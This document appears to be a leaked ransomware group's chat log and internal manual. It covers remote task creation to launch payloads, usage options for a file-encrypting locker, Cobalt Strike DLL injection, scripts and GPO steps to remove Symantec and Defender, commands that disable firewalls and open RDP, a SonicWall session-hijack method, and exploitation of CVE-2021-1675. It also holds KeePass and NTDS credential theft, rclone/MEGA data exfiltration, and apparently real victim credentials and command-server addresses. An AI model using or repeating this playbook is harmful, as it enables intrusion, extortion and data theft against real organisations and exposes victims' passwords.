1. Creating a task with SCHTASKS :: SYSTEM CONTEXT OUTPUT

    shell SCHTASKS /s remote-hostname123 /RU "SYSTEM" /create /tn "WindowsSensor15" /tr "cmd.exe /c C:\ProgramData\srvhost.exe" /sc ONCE /sd 01/01/2021 /st 00:00

1.1 If all is well in response we see


    [+] received output:
    SUCCESS: The scheduled task "WindowsSensor15" has successfully been created.



2. Starting the task


    shell SCHTASKS /s remote-hostname123 /run /TN "WindowsSensor15"

2.1 In response we see:


    SUCCESS: Attempted to run the scheduled task "WindowsSensor15".

---

At this point the session should arrive. If it does not come, there are several options:

No Internet, binary burned, firewall



3. Deleting a task



    shell schtasks /S remote-hostname123 /TN "WindowsSensor15" /DELETE /F



    SUCCESS: The scheduled task "WindowsSensor15" was successfully deleted.





There is also with user context. Works by specifying domain/login + password

It's all the same


     
    shell SCHTASKS /s 192.168.97.23 /U "domainad.com\ralexand" /P "Password123" /RU "domainad.com\ralexand" /create /tn "WindowsSensor1" /tr "cmd.exe /c C:\ProgramData\x64.exe" /sc ONCE /sd 01/01/2020 /st 00:00


    shell SCHTASKS /s 192.168.97.23 /run /TN "WindowsSensor1"


    shell schtasks /S 192.168.97.23 /TN "WindowsSensor1" /DELETE /F





!!!Don't forget to do after getting a spawn session or inject into the process, knocking out your process and deleting the binary you came in with. This way paleoad will live much longer
I will check it on the grid in the morning and i will let you know if i am updating ....... and then updating saksaful and then updating forces at once will ask for a policy update. i just did 1v1 but it did not update like you said. but when all PCs turned on gpuapdate force - worked in the manual you threw the same and it says) in the last case did gpa to disable def, then there in tmd groupupdate force and checked 3-4 servo servers, everywhere wrote that the def program is disabled gpa[ ](https://stylebrooks.com/group/discussion?msg=pFGy7vSNAnTPdcy6m) @red on all PCs ? you checked it straight ? but thanks guys no longer relevant) gotgpupdate /force do on dc and everywhere else is updated immediately and a half hours through the GPO comes the result?all right. well, to make it quick - gpuapdate why on every machine? you do it from the admin on the DC where you work with the GPO and all, and the timing is 90 minutes or wait 1.5h - default timing for the update. I have not checked this point, then the policy is updated, this is the setting that you gave in the screenshot and everywhere def is extinguishedgpupdate /forcefly, on each machine should be done vindef turn on just when a third party AV disables first third party AV then disable vindef through the GPO yesThe question, how to properly organize the shutdown of these protections? First a third-party AV, then through the GPO? Guys, we have a network with FORTY AV ENDPOINT on board. Access to the PU is available. Connected cars simply disconnect - clients are not active (waiting for connection) - but hangs DefenderVasyaPypkin@Air pour okvot here the date fill
into the generalinsulation.com folder
and let me know how it's done
```
172.82.162.66
admin
3cT26dDrDCwS
ftp 21 port
Waiting for him I know he has already got it, but I do not, and when we and Alex will be given the decks and servers under the msf? We are in suspense? did not get there a month of silence?slicetonyternerlexmant3chnologbobbybrandonbradalexvampirstakanspoonmrFlintstonessonarAirFurytwinstevenfat32AraratmagaAndyflyalibarabulkajeremyasdf7f814vycfasgreenwhiteredskywalkersebastiandoyfsargonlunaVasyaPypkincybercatsamuelgiovannimichaelShvedrozetkaEto Don't flood this board with questions! Any technical questions write in the personal - I'll duplicate here then as a question-answer.
WARNING: Everything described in this channel may not be distributed, copied or published on any third-party resources.

Things to remember and know.
1. A separate build is always generated for each grid and you need to query it by calling @alter in the conf.
2. In the standard package, the build is given as an archive, which contains an .exe file and two .dll files for different bit rates for fileless launch via cobalt sessions.
At the moment fileless startup bypasses the vast majority of known AV/EDR systems, no loss in speed is noticed

Startup parameters:

-m[all/net/local]
all - Encrypt all (Default)
net - encrypt network resources only
local - encrypt local files only

example usage:
lock.exe -m all or lock.exe
lock.exe -m local
lock.exe -m net

launch example:
lock.exe -h C:\hosts.txt

-nomutex
Disables mutex protection against double starting.

-size[10/15/20/25/30/35/40/45/50/60/70/80]
This parameter defines how much % of the file will be encrypted (by default 50%), the file is encrypted in different places in chunks.
At the same time databases are 100% encrypted and VM files are 20% encrypted regardless of the value of the parameter.

example:
lock.exe -size 35

-p[path]
If this option is used, the locker will encrypt files in the specified path
It is forbidden to start the locker in normal mode until the specified path is processed.

example:
lock.exe -nomutex -p C:\path
lock.exe -nomutex -p C:\path2
lock.exe -nomutex -p \\\host\path

-log [path to log file]
Enables error logging
Example usage:
lock.exe -log C:\log.txt

All parameters can be combined with each other, the order is not important.

Running as a dll through cobaltstrike

Put the files inject.cna massinjector.cna inject_x86.o and inject_x64.o in the same folder.
Load inject.cna file cobaltstrike -> script manager -> load

An example of running within a single machine where there is a session:
mandllinject c:\path\locker.dll

Pass the arguments in quotation marks
mandllinject c:\path\locker.dll "arguments here"

Example of a single run on X machines with a session:
Select the necessary sessions "in a batch", click on PCM and choose from the menu dllinject
In the dialog box that appears, specify the paths to the dll locker of the required bits and arguments (if any are required) and confirm.


NOTE:
It is forbidden to start the locker in normal mode until the specified path has been processed.
PLEASE NOTE
this is due to the inclusion of nomutex!!!

- What does this mean?
It means that either you can run the locker with -nomutex any number of times with a path, but there must not be a running locker process WITHOUT a path until the "specified" path is fully processed.
Remember which other convention needs a weekend locker Anybody who needs a session for SonicWall's 2f bypass, write now and let teamleaders know what's what.
If you have a problem with SonicWall, you'll have to get it right away if you have a problem with SonicWall in the meantime.
On the dincheck now check with whitelist.
Because with full internet leak pailoads and detects come quickly.
in whitelist add ipaks pads + cobalt servak, add 3 ipaks (cobalt + 2 pads usually we have)
check
session should come and work but paleoad won't leak
when koba gives error and error code, you need to know more details,guys,remind me please how to look error text in koba?
5bRSiB can publish
``+upload
5bRSiB
I was able to connect via webhop, but fotik still says no access to the webhop server
            username 0mpgreco
            domainname DOMAINNT
            password Marilyn1414

            username 0mslav
            domainname DOMAINNT
            password Bblucas2

0mycarri domain admin
username 0mycarri
password Wukong55
I got it, thanks for the tip any hoster actually) where can we get a dedicated server from their region?  like kanada they better even look at the server, which directly in their state will be aha, right maybe a dedic from their country need as oboytii I do not know what it is) the regiononalkya know what it is, there is a problem with the connection the first time I met, like one creed fit, but the error during authorization, as if they have set additional check on some parameter, like authorization not only by login and may be like a mac or ip, I remember at work long ago was so....and in the same groups, look at other users and their hashes look in which groups is the user who was valid on the WpN earlier hello, there ntds not small picking up by now...well how did something come up?kk I'll try to pick it up look ntdsfortiktut there is nothing to reshoot it fortikaltegnu so we will reshootnu one person wrote that he was able to solve when he was given other creds googliten put che nmidimo real av need I have tried i tried it with 7 and 10 with brandmauer switched on so i did not see that toohzmoz maybe an av should be set there are some connection requirementswith the same error hz (no it is not the axis try it with 7 need@alex try to subscribealex879 953 707
c8ez85 let's have a look at it together now this FortiClient_6.4.3.1608 before it was FortiClient_6.2.6.0951which client do you have ?i used FortiClient 6.4.3.1606 before that i had FortiClient_6.2.6.0960 before it installed on my client i will check it with air and i will check it with the client no connection to the web i see what i see when i pressed the client opens with the same codes to 80% and error see what's going on there i have to finish jumping with air and will have to work so presskweb and try to go through vpn do not fit the codecs all check it works works works now reschedule this coba is also not available where the last network did 104194.11.92:61214 , maybe there are other koba crosses where you can connect to work? where have worked before209.222.97.23:38614 and the koba is spunikewaiting until the koba rebut where they worked beforeHi all hi@stakan do look in all their merged data something with the aim of
Cyber Excess
Cyber Insurance
Insurance
Cybersecurity Insurance
Cyber Policy

and so on... as it turned out, not enough attention is paid to this in the data dumping, so I want to collect "samples" gentlemen
help when there is no central console and different AVs are not universal, some AVs are not like installed software, you think that is a universal solution for remuv, then in the arg for remuv goesSER GUID for other AVs I do not know, to start remuv need idiishnik which we get in the first line of code and then either luck or no name take directly from the list of installed programs as it saysWheres-Object {$_.Name -like "ENTER AV NAME HERE"}
Write-Host "AV_NAME Uninstall Successful... Continuing"
throw "AV_NAME Uninstall Failed... Exiting "case handled. there are 100 servers with simantec and paiload was in trouble. this solution helped. so this is analogous to guish uninstall, no? uninstalling simantec by parshall. Requires a reboot but after starting this code for 3-5 minutes remoobs and you can jump on the cmb listener and start the locker. This is without the pass.``$SEP_GUID = Get-WmiObject Win32_Product | Where-Object {$_.Name -like "Symantec Endpoint Protection"} | Select-Object -ExpandProperty IdentifyingNumber
#Uninstall SEP - All versions. - Wait for uninstallation to complete
$SEP_arglist = "/uninstall $SEP_GUID /qn"
If ($SEP_GUID -ne $null){
    (Start-Process msiexec.exe -ArgumentList $SEP_arglist -Wait -PassThru).ExitCode
        If ($LASTEXITCODE -eq 1){
            Write-Host "Symantec Uninstall Successful... Continuing"
        }
        ElseIf ($LASTEXITCODE -ne 1){
            throw "Symantec Uninstall Failed... Exiting"
        }
}
``@rozetka wrote in personal. Who's online ? Hands needed. urgently )Who has cobalt with paiload that simantec is ? URGENT for those who need to work with SonicWall through browser sessions

Using a WEB-browser to access

```
 - take the session from the script output, e.g. "47ZjFKx24Nj2h0UtZKX2OYnZLgRg05aX2SuaotVzrQg="
 - Open the browser in incognito mode, open the developer's console (js-console)
 - Encode ID of the session in base64
   >> btoa ("47ZjFKx24Nj2h0UtZKX2OYnZLgRg05aX2SuaotVzrQg=") [ENTER]
   "NDdaakZLeDI0TmoyaDBVdFpLWDJPWW5aTGdSZzA1YVgyU3Vhb3RWenJRZz0="
 - type in URL https://target (redirects to https://target/cgi-bin/welcome)
 - go into the application/cookies in the console, add the cookie
   swap : NDdaakZLeDI0TmoyaDBVdFpLWDJPWW5aTGdSZzA1YVgyU3Vhb3RWenJRZz0=
 - in your browser (where .../cgi-bin/welcome) change URL to https://target/cgi-bin/portal
 - access the resource under the user's session

` `https://mega.nz/#!nBhlxLaT!3O9jgeDo5u0oCAxWDfEZsywsywpXKBpe6IS0CRvAC_7Ils Manual on Koba (ru)Friends, if there is anyone from Ukraine - write to the PM. This is important.question is resolved by installing JRE 9 dialogue can Ctrl + Plusa does anyone know how to increase the size of the coba on the monitor 4k 32? The entire operating system is scaled to 150 and the coba - take your eyes out) throw 4.1 at least) because the new hardware, there is no nifig) did not test it? 4.2 like walking on the forumanybody can throw the server part of the 4.1 in the archive?sargondoyfsebastianskywalkerbarabulka hello everybody hello, I'm going back to work this week, still cleaning up the mess last year - but in touch, who else is resting at will can rest until Monday because some of our partners will be a week, but cases and work there so who needs - write to the PM today, will find, will give out) @atom ask @terner ` ` `
Hi guys
if someone has brute-forced the mail, or knows some useful links, please share
``elefantkalinka ``without a hook trying to run a hike tried koba 4.2 put - no way eh. says the wrong authorization file is in the one that was given here, then went to the exp downloaded 4.2 cracked from there - and the same thing - wrong authorization file, I do not know what the hell happened to who already color 2021 1675 ?https://github.com/SecureAuthCorp/impacketпомидорами do not throw) what the implementation under the impaket, googled did not understand where to apply it[ ](https://stylebrooks.com/group/general?msg=qcFvuzmqggyqnuuii) please write back if anyone successfully exploited with dll cobalt at least pick any hoster that accepts bitcoins, the rest is unimportant, got it,@all hi pod vpn> suggest hosts for linux[ ](http://wfy76wigkpoxqbe6.onion/group/general?msg=zAi3XiXxE45FqTAiE) ?
https://github.com/cube0x0/CVE-2021-1675

Sploit implementation right under the impacket
Rosetka suggested a working trick to change the date in Cmd
If you get a coba telling you that your license has expired, do the following:
In Cmd change the date with the command data 01.07.2020.
After that start the coba and change the date back,
OpenVpn might complain about expired certificate
try it on vin 7 and did not work on vin 7, still the same error, does not connectprivethe192.95.20.8
u: Administrator
p: iddqdidkfa!@#$IDDQDIDKFA
```
``I ordered it, is it Canadian, so? +support hashahueno )a fucking time-saver in raising the truth nihueno://securityonline.info/lsassy-extract-credentials-from-lsass-remotely/ output fuck. dekript remote would output type in file? it simply has a checkbox /password
he should de-crypt with it but it doesn't work and i've never tried it
i'm not sure if sharkhrom gets into the file correctly ... was chrome taken off the remote control without dpapi key ? can sharkhrom get a script ?
```
histories in kmd . sometimes there might be something useful
RDCManremember pliz what to process servers through the rdp not to clog the cracks all the time? rdp manager or so the software is called, thanksvidos which is the main from alterabyls manuale like all hello pliz how to properly use the Net-GPPpassword.exeobviously in the msf this is in paiload and arrives at the session
you can use paleoad to execute code in kmd - for example, to create a local admin. then authorize it and drag the credentials.
``exploit(windows/local/ms16_032_secondary_logon_handle_privesc)``
in case of successful exploitation, should it throw a session to us in the coboo from the system? or a process from the system to raise on the host?[ ](https://stylebrooks.com/group/general?msg=hASmKe5grxTijBaTv) and what is useful there? right, and I'm talking about the file ntuser.daton for taking hashes off-line if you sdamped ntds from pdc just in case I tried to use it and it failed.https://github.com/zcgonvh/NTDSDumpExШас showWho knows, is it possible to extract useful information from the file ntuser.dat and if so, how to do it?
Who has used Little Snitch? Pm report plyzest useful thingshttp://morph3sec.com/Cheat-Sheets/Windows-Red-Team-Cheat-Sheet/mozhet to someone will be helpfulNo, it is better not to make noise, and use something from the native utilities, but psexec seem locked in sophos and the service itself is not remote host does not start it and psyekzek comands isremote-exec psexec mb ?what do msf not like then? they also have psexec there) no
it's about the psexec utility itself being blocked by avera) what's to solve here so bypass it guys, didn't you have sophos psexec blocked?
No one knows how to solve it without access to the console?
Can't you do something in the registry or stick psexec somewhere in sophos? Yeah, I got it, thanks[ ](https://stylebrooks.com/group/discussion?msg=L6dwAKr2LyBxS7GiC) then control F and ``Gigabit
``that kind of thing``
exclude
DB
SQL
FS
DB servers are either off the Internet or have security solutions (or should have) APP
MAIL
EXCH
PUB just choose a server and call it from Psexec \remotecomputer systeminfo
``psexecec scriptsysteminfodoes anyone know if it's possible to make a check of the machines on the internet channel to find a gig for pumping[ ](https://stylebrooks.com/group/discussion?msg=sDY76YDoo3R4YkmjZ) If anyone else needs it, we beat it this way:
```
Adobe Flash Player when trying to run content in browsers redirects everyone to the site where it says the end of support and use the content does not come out.
But there is a solution, in recent versions there was a "time bomb", which works around quite easily - just change the date to 11.01.2021 and voila content access
``````
for /F %%i in (hostnames.txt) do dir "\\%%i\\c$\ProgramData\oracle\config\public" >> log.txt
Aah, bring it back. I'll test it. if it's still relevant and if I understand you correctly) oracle change the name of the software you need Who can make a simple binary? TK :
There is a way
``\\hostname\c$\ProgramData
\\{\hostname1\c$\ProgramData
\hostname2\c$ProgramData
```
Take a listing
In the output we get ala
````\\hostname\c$\ProgramData\oracle
{\hostname\c$\ProgramData\microsoft
{\hostname\c$\ProgramData\Adobe
```
Next, take the listing and put it in a file like this
```
dir "\\hostname\c$\ProgramData\oracle\config\public >> log.txt
dir `\\hostname\c$\ProgramData\microsoft\config\public >> log.txt
dir `\\hostname\c$$ProgramData\Adobe\config\public >> log.txt


dir `\hostname1\c$\ProgramData\oracle\config\public >> log.txt
dir `\\hostname1\c$ProgramData\microsoft\config\public >> log.txt
dir `\\hostname1\c$$ProgramData\Adobe\config\public >> log.txt
```+
and a toad on top of it. Good morning, gentlemen.
Does everyone have expa? old browsers does not work, ruffle does not come in the desktop console can not see the plugins on the sphere backup, html5 does not support the sphere itself (old one) has anyone encountered the fact that you can not go to the web console vsphere because of the end of support for flash player? Thanks the same (gentlemen who already worked on 4.2? did not encounter the problem of "dying" session when simply trying to open the kob file browser ?
at first I blamed the side of the av, but after testing on your own deadlock, the effect is the same !) a), but I do not need it anymore) I zalezhesh Last Pass and I daina not really need it - and actually understand what you mean) It was just a question, and then gave a link where to shove and where to get the hash, but other options thrown immediately into the piggy bank[ ] (https://stylebrookscom/group/discussion?msg=CkgMtEc6rbk5ody5t) passwords from chrome and if there is a possibility of mutation deallay all passwords from chrome and pobrutParties, do you have at hand userdump.exe, clean
the link is dead https://www.microsoft.com/en-us/download/404Error.аѕрхи on the githab is a thread swearing at the script from harmj0y so if you have an option online without having to dance with the installation of unix os then it is better to think so john the most capital variant, although I am not particularly familiar with it yet) by the way yes note ! that script that on the link for me, too, did not work ! solved the one that came with the OS out of the box ! tried a couple of minutes ago via a script on python, but a little output did not give, maybe it's in the algorithms or so. I am from unix, I had a J.R.well! thank you faster http://hashes.com/en/johntheripper/keepass2john ` `!
https://www.harmj0y.net/blog/redteaming/a-case-study-in-attacking-keepass/
http://www.harmj0y.net/blog/redteaming/keethief-a-case-study-in-attacking-keepass-part-2/
``@alter yes
the output is something like ``
Passwords:$keepass$*2*6000*0*221591f87534ede8b704227ec925802a78e8fd516b11278766f43a542e27cd22*68a3559c44bbc1d3ec8f59c646680915bd432b39f4e14f173666322ffc68e2b4*ecf2bf73bd822f1f94c4b9b2290ad93e*6f5515fc4fc3916729346e913060aaebe9f56383b32c554b35abaa03244ef65e*cbf8542495556206ddaf3cc7ab6064aba7eda33d410ab0deabf12500f87cd205


```
but do not forget to watch the config file it is usually in the appda, if the passport is not portable, by configuration you can understand whether you use only master password or master password + login in the system, etc. there are several variantsoknet
should not be if you use the utility userdump.exe then the process will not die after the dump?
To create a dump file for the sqlservr process, the command would be:
C:\userdump sqlservr.exe sqlservr.dmp
So is it dumping the running process? @white and how is it just dumping a password hash out of a cdbh file? just recently there was a case with keipass db password - thanks a look atJohon the Ripper dumped the hash perfectly, and then everything is classic, exactly no open copies of programs (hmm... thanks to memory find where kipass is running and dump it alivePlease tell me, found .kdbx but no pass, brute force pass from the grid did not give any success. What other options are there? Happy Holidays guys! Cloud Repository in viam - who dismantled it? How does it work? Hash with access decrypted, login pass and host are there. From external ipac scan nmap with checkbox -Pn bunch of ports - everything is closed.  What is the protocol/port and how do I break the backups? i can't hear alex since friday, he's gone missing somewhere, i'm waiting for him i'll be here by eveningsonar take ayra and i'll give you a clean paleidlogin and pass i threw you the data on the download, go up to the admin at home, jumpyvoice through the smb login i found it
[+] 10.19.222.47:445 - 10.19.222.47:445 - Success: 'calbeena.com\jkepley:Nellie69' Administrator
[+] 10.19.222.50:445 - 10.19.222.50:445 - Success: 'calbeena.com\rfoltz:Money$123' Administrator on 1 vpn krede approached the time of the change of pasvidimoe you just got burned or the time of the change of pasvidimoe on which was vulnerability at me toopodtrivayte take local admin hash and puncture itpodobnoy i can pull 1 session and they have not validate this netair do as we jumped then sonar need to look for the kredeys these kredeys are not valid anymorecom\serveradmin:P8w7521!' Administrator session is deaddate with the downloaddetermine and on the downloaddetermine how to download ?
COBA://104.238.220.89:59062
n9JidNWJmCwONb8g8codTqULgTzBXHrtuG
``That's the way to run it''.
rundll32 name.dll, GetStdHandle
``beacon> jump again I gave you dllllpoe cmb
``beacon> jump psexec64 10.16.181.12 smb_L
[*] Tasked beacon to run windows/beacon_bind_pipe (\.\pipe\npfs_8f) on 10.16.181.12 via Service Control Manager (\\10.16.181.12\ADMIN$\45bae58.exe)
[+] host called home, sent: 291438 bytes
[-] Could not start service 45bae58 on 10.16.181.12: 2
[-] Could not connect to pipe: 2
``````
	Line 2: [+] 10.16.222.22:445 - 10.16.222.22:445 - Success: 'calbeena.com\serveradmin:P8w7521!' Administrator
	Line 4: [+] 10.16.181.22:445 - 10.16.181.22:445 - Success: 'calbeena.com\serveradmin:P8w7521!' Administrator
	Line 7: [+] 10.16.181.12:445 - 10.16.181.12:445 - Success: 'calbeena.com\serveradmin:P8w7521!' Administrator
	Line 9: [+] 10.16.222.159:445 - 10.16.222.159:445 - Success: 'calbeena.com\serveradmin:P8w7521!' Administrator
	Line 12: [+] 10.16.222.24:445 - 10.16.222.24:445 - Success: 'calbeena.com\serveradmin:P8w7521!' Administrator
	Line 14: [+] 10.16.222.136:445 - 10.16.222.136:445 - Success: 'calbeena.com\serveradmin:P8w7521!' Administrator
	Line 17: [+] 10.16.222.28:445 - 10.16.222.28:445 - Success: 'calbeena.com\serveradmin:P8w7521!' Administrator
	Line 19: [+] 10.16.222.29:445 - 10.16.222.29:445 - Success: 'calbeena.com\serveradmin:P8w7521!' Administrator
	Line 20: [+] 10.16.124.20:445 - 10.16.124.20:445 - Success: 'calbeena.com\serveradmin:P8w7521!' Administrator
	Line 23: [+] 10.16.124.7:445 - 10.16.124.7:445 - Success: 'calbeena.com\serveradmin:P8w7521!' Administrator
	Line 25: [+] 10.16.222.39:445 - 10.16.222.39:445 - Success: 'calbeena.com\serveradmin:P8w7521!' Administrator
	Line 28: [+] 10.16.124.39:445 - 10.16.124.39:445 - Success: 'calbeena.com\serveradmin:P8w7521!' Administrator
	Line 30: [+] 10.16.181.39:445 - 10.16.181.39:445 - Success: 'calbeena.com\serveradmin:P8w7521!' Administrator
	Line 33: [+] 10.16.222.11:445 - 10.16.222.11:445 - Success: 'calbeena.com\serveradmin:P8w7521!' Administrator
	Line 35: [+] 10.16.222.13:445 - 10.16.222.13:445 - Success: 'calbeena.com\serveradmin:P8w7521!' Administrator
	Line 38: [+] 10.16.222.12:445 - 10.16.222.12:445 - Success: 'calbeena.com\serveradmin:P8w7521!' Administrator
	Line 43: [+] 10.16.222.25:445 - 10.16.222.25:445 - Success: 'calbeena.com\serveradmin:P8w7521!' Administrator
``Which dll jump my not come session all hello jumped ?how are you doing ?pull on cmb port for vmik is closedERROR is climbing:

Description = The RPC server is unavailable.when I want to pull up[+] 10.19.222.57:445 - 10.19.222.57:445 - Success: 'calbeena.com\amondragon:AlPe$7148' Administratorokay I will run myself) (I do not have a server with metasploithere that was and look for koboya I'll give you a soxmozhet to cmb run servers? and send data to kobipid552460 kobaa what koba and what pid?so here's the sortez gentlemen)will assemble addaway jump excellentnot yet slitherode found a stable connection morning picking up normalvpn rises but after a minute drops out because the users on the course reconnectokshcha i will raise i have a dedicle all hey just go to him ping modet just firewall closed should load the dedicle and does not ping so far what with the guys can i dedicate or while with the guys?sonar will check in 5 minutes and it will be ok by evening I do not have a wake-up call, do you have the ddik?hi all hello@Air[ ](https://stylebrooks.com/group/conti?msg=9NrF3MDkPoHiWyd3D) rumor has it that the number of threads can be reduced as an alternative to samba. are there any interesting options how to debug without a test? what to test, apparently avers started fighting in their circle, a couple of months and all this to vedutuga i understand can take the av and test if such a thing and he does not give a sale to the averlockehr.exe -p \\host\c$ and eh and the dll? when started from a foreign process or from the hard drive? sofos TM kasper two or three months and all the avs will enter =) there may still be a chance to revive the method need to debuginethe securiti like kasper? or kasper antiransom suite? not encountered but I think the injector to patch kasper started to paralar lock + TM probably also
anyone else had a problem with what?
by the way, also saw this arbitrage, 7kk) dzhe chem with this, each other rolled up, although the ransom was not, tinny)))
```
there marazmibo with default -size 50 you need to rerun 7.5tb, it takes a very long time (= do not have time) locally
but put -size 10 or -size 20 inside operations there is another folder with the same contents, inside this folder there is the same folder with the same contents etc
When I downloaded the date all zips grabbed this folder and download the same files, but if you consider recursion there is a tb 15, but in fact the original date there at 500gb where is the recursion?guys,does anybody know if there's recursion in a folder then the locker will encrypt the same folders again and again until recursion ends? for example Y:\operations\operations\operations\operations, etc. By the way, I also saw this arbitrage, 7k) I don't know what will come of it, they'll bait each other, although there was no ransom, trivia)))PR:Dinteresting))
[10:32:11] 8-800-555-35-35: there are no such top lockers left on the market.
[10:32:18] 8-800-555-35-35: maze aka egregore gone
[10:32:22] 8-800-555-35-35-35: Conti's gone
```
here's what unkn writes, found in the arbitration on the xdex, you cling to it, on the virtual machine you raise Kali\backbox you can walk around and the fortress doesn't care about it wantkn, don't use cobalt) i tried to wrap the route to the timeserver through my gateway is there any way around it?and there is something that cuts your connections when you connect the VPN - your network connection goes through the internal network of the company I checked the routes, fortik can proxy or what?and if the firewall - there may be a whitelist tls handshake, that's how) i mean how the routes are fine or the firewall is twisted, in any case, it's from the side of the network defenses, but how?ids blocks you, traffic to the coba begins to go through the internal routing when you connect to the vpndavay look at itself is a virtual machine and from there podrobivyte on dedik virtualkuping to timeserver goes, the route does not change the connection on the rdpvpska flies away from the hookupre guys, hey, who had this, connect the fortik > flies off the server from cobaGrimnirCodeocta0dayinbizChucktu@topuy write please feedback on tulchin
what is not working
what is not clear how it works
what to add
what to remove
When you click on spread a window opens with 5 fields
1 In the first field you have to choose a path to the artifact file to create sessions or exe/bat/dll file for the payload
2 In the combo box select wmi/plsexec method
3 In the third field you must enter the default path to load the file as "C:\ProgramData".
4 In the fourth field select the path to the list ip/host
5 In the start line you enter arguments, if there are no arguments you just need to press Run Spread
6 By pressing Run SpreadForms a request to the domain to the controller ip/host from the list in response comes the addresses to the target hosts
7 Forms UNC path to target directory
8 Paths are sent to download function and it loops to download the selected file.
9 After a timeout of 10 seconds (this timeout can be adjusted), to be sure the file is in the chosen directory, a startup command is sent with arguments (if they are given)
``@all together update all those who use
enhancement_chain.cna
main.cna
Import

Pay special attention to Other->Lateral
this is a tool to distribute and run eh/dll files through a list of hosts/ipacsnimbus2000 will work this weekend ? hello there + hello there ! anyone alive ?
i will write to him log on to the iphone from the dedicat and jump there brad has a tsktak you said with food to do, but now wait till you can get on the rdd can do it with brad chase the net with the iphone what to do yes i told you there is work ?vampirnot yet have a job mubea + hey all, stevie, i got nothing to do (search for passes in the kipasa not take into account) all hey, what do i do today, i'll give you something soon what to do? thank you[ ] (https://stylebrooks.com/group/general?msg=cFaT9BfhcCaaXdoKH) here's the bro, here's a guide how to use the shuttle so you do not separately porting, i did not put it right
```
https://defcon.ru/network-security/3789/
it's a really interesting thing) @cybercat can you show me what it's about? > https://sshuttle.readthedocs.io/чет I only found in the instructions how to wrap traffic, I do not see how to forward ports, port forwarding@cybercatsa as far as I understand it on the client then you can for example raise proxy, I glanced up, it is vpn via ssh server without administrative access, got it right? mysql? Guys, do we have any whining pros?:sweat_smile:on the githab who made a new proxygon? if you can't connect to ipn then you can unpair the ipn users from AD and brute force them, not all domain accounts are blocked if you connect to ipn but you need to take the domain again. I had one login last night and got kicked out. can i have a panic attack on my account?[ ] (https://stylebrooks.com/group/discussion?msg=tLMMQuqQ59Kvu9dDu) In general, there is a VPN check on the ms17 for starters) and had to remove the local admins from the cars) so if the vpn broke the aces as you turn to the dk? Guys! All have a good start to the week! No such fucks like us) In general, there is a VPN. And all. All accounts are blocked, the admins burned the activity. ZeroLogon defrauds from the VPN? Can I try it from the VPN? But I need to somehow pull the DC. Is there a point to fight?
```
-v
``and there will most likely be an error there will show all that thinks about you)I will try, thank you and what gives this flag?
--verbose
there may be a problem with this flag... add ``verbose flag'' to the rootclone... add ``bose flag'' to the rootclone... does it work at all?people, what do you think may be the case - rklon could not pull the archive size of 11gb, time was plenty, but when I unloaded the folder, there is no problemspasibut look here convert = http://www.hexadecimaldictionary.com/hexadecimal/0xd3d/REG QUERY "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber If it doesn't work, check the RDP port used therereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKLM\SYSTEM\CurentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
netsh firewall set service remoteadmin enable
netsh firewall set service remoteesktop enable
netsh advfirewall set allprofiles state off
netsh firewall set opmode disable
Hi, I need to use the VMIKEK or VMIKEK from the impacket. Could you please tell me how to open port 3389 remotely. I used a command via batnick and remote-exec psexec does not work.
``reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
I think some kind of key is specified in the general topic today can not work with bicon, from cmd have to. i do not know how to pass the parameter password, with bicona google the key all i understand in the launch string password is specified@ATX and you start from bicon ? you can join cps tunnel through ngrok, create a separate ssh account and ipac will hide behind ngrokommega locate, so reservers copy should always have. and ftp/sftp abuzz tooa about the ban account - it's clear, just what's confusing, what these fuckers did not delete ni mega nor configsynchronization is configured if korp write abuzz on the mega, indicating a specific ak, and there is one username\login enough, then in theory may ban the akda for nothing. Ideally, put mega software on the deck - megasinh, and immediately synchronize remote folder from the mega to your granddisk, and it turns out, all that downloads rklon simultaneously synchronized to your granddad thanks brother, of course I was stupid look at you dolboycher I if you do not put a password in the config - mega account in the config in the open form# Encrypted rclone configuration File

RCLONE_ENCRYPT_V0:
ch1QBcoL8zkZ1B2IVQtV00DqEkBAKMpJEJFz1k4iEKNwVHICSBHS9nGgT6Fx1ucyHRd4GKC/jlsAWtwhpNkFpSN0LzEJeth9AtMqoIMIo+Y+p9TZybEGu9Ba8xjj2BjqFW61xy773gNElFXVOcwxAcYXq4yIWFuiMk2X if to put a password in the pclone config, the config looks like this, you'll have your mail stolen, as far as i know, when you create a config, there рclone encrypts only the password and you encrypted the config with the password?haven't heard such a thing, hello everyone, has anyone experienced mega account blocking when you drag there date pclone ?
just at me pklon itself and config file in place, and the account is blocked, usually, if the network palyat rklon, then it then you can not find, because it deleted, but here everything is in place and the account in the block.toomochaniya there multithreading is set to 100 or so if you will use through sox put a flag -t15 or 20[ ](https://stylebrooks.com/group/discussion?msg=dRuYGZwajMWKbTJiq) the most effective solution[ ](http://wfy76wigkpoxqbe6.onion/group/discussion?msg=doNK6ztT6DHJALcin) can give vpsku with meshcrackmapexec through sox trya although no, not a fact, I am stupid uene 5-10-15 try to catch account lockoutCertainly know where the user can go where not.Guys, there is a way to check the cracks on all machines as that from the kobe? Where to go where not. Pro MSF I know, but is there a quick solution? As MSF is not up, there is no other software, and if mimicatom from the disk clear the fuck will eat all the software and its libs in the context of the session process in general as I know mimic in cobalt works in memory randll32 but now with hands without a koba, i can't do it with cobalt because it has a different working principle and sometimes with avs it's ok, but if you work with cobalt, you can't inject with vin10 mimicatz verushelny in principle any AV will fuck you up) mimicatz on verushelle is ok, because vin10 has amsi and defender will fuck you up as well look it up
